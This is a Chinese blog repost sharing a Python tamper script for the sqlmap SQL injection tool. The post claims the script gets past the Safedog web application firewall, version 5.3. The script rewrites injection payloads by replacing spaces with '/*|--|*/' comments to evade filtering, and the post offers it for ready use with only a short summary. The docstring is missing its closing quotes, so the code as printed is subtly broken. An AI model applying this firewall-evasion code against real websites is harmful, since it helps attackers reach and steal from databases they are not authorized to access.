可以过5.3版本 放出py
#!/usr/bin/env python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file ‘doc/COPYING‘ for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces space character (‘ ‘) with comments ‘/*|--|*/‘
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper(‘SELECT id FROM users‘)
‘SELECT/*|--|*/id/*|--|*/FROM/*|--|*/users‘
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/*|--|*/"
continue
elif payload[i] == ‘\‘‘:
quote = not quote
elif payload[i] == ‘"‘:
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/*|--|*/"
continue
retVal += payload[i]
return retVal本文转自:http://www.silic.top/index.php/archives/6/
原文:http://www.cnblogs.com/dongchi/p/5079135.html
本文介绍了如何使用sqlmap的tamper模块来绕过安全狗防护,特别是针对MySQL 5.3版本。提供了一个Python脚本,该脚本将空格替换为注释,以避免被防火墙拦截。此方法已成功测试于多种数据库系统,如Microsoft SQL Server 2005、MySQL不同版本、Oracle 10g和PostgreSQL等。
749

被折叠的 条评论
为什么被折叠?



